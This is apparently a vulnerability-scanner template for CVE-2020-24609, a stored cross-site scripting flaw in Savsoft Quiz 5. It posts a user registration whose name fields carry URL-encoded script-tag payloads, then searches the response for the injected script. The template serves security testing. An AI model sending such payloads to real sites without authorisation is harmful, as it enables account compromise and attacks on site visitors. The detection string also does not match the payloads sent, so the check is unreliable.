id: cve-2020-24609
info:
  name: Savsoft Quiz 5 Stored XSS
  risk: High

params:
  - root: '{{.BaseURL}}'

requests: 
  - method: GET
    url: >-
      {{.root}}/index.php/login/insert_user
    headers:
      - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3984.0 Safari/537.36
      - Content-Type: application/x-www-form-urlencoded
      - Referer: "{{.Host}}/index.php/login/registration/"
    body: email=hack3r%40gmail.com&password=Hacker%40gmail.com&first_name=%3Cscript%3Ealert%28%22XSS+0%22%29%3B%3C%2Fscript%3E&last_name=%3Cscript%3Ealert%28%22XSS+2%22%29%3B%3C%2Fscript%3E&contact_no=9876543210&gid%5B%5D=1
    detections:
      - >-
        StringSearch("resBody", '<script>alert("XSS")</script>')

references:
  - https://www.cvebase.com/cve/2020/24609
